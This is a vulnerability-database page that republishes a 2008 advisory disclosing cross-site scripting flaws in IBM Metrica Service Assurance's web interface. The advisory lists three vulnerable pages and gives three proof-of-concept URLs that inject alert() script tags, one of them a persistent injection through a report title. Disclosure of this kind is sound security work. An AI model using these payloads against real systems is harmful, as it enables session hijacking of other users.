Lucene search

K

metrica-xss.txt

🗓️ 09 Nov 2008 00:00:00Reported by Francesco BianchinoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Metrica Service Assurance Multiple Cross Site Scripting vulnerability in IBM's distributed, J2EE-based web applicatio

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Metrica Service Assurance Multiple Cross Site Scripting  
  
***********************************************************************  
  
Author: Francesco Bianchino  
  
Email: [email protected]  
  
Title: Metrica Service Assurance Multiple Cross Site Scripting  
  
Vendor: IBM  
  
***********************************************************************  
  
Summary  
  
Metrica Service Assurance Framework implements a distributed,  
object-oriented, J2EE-based architecture. It work with a Web-based  
user interfaces, from end-user report generation to detailed system  
administration and configuration.  
  
***********************************************************************  
  
Vulnerability Detail  
  
The web-based interface of Metrica Service Assurance is exposed to  
multiple XSS attack. With an authenticated user it's possible to steal  
other user's sessions due to a flaw in the input validation  
mechanisms.  
A persistant XSS permits the insertion of malicious code into the  
web-based interface. Using the report generation function it is  
possible to create a report with malicious code in the name.  
That code is than rendered on the victim's browser when opening the  
report history which can be found in the main panel of the  
application.  
The code also persists into the main panel and all the users are  
exposed to the attack.  
  
There are at least three vulnerable pages:  
  
Non persistant:  
* http://server/<document root>/ReportTree  
* http://server/<document root>/Launch  
  
Persistant:  
* http://server/<document root>/ReportRequest  
  
***********************************************************************  
  
Exploit  
  
http://server/<document  
root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non  
persistant XSS");</SCRIPT><!--&date=0000000000000  
  
http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non  
Persistant XSS");</SCRIPT>  
  
http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant  
XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main  
  
***********************************************************************  
  
Solution  
  
At the moment of writing this advisory the is no solution yet.  
  
***********************************************************************  
  
Credits  
  
Discovered and advised to IBM, November 2008 by Francesco Bianchino.  
Thanks to Marco borza and to da EthicalHAkinTeam  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo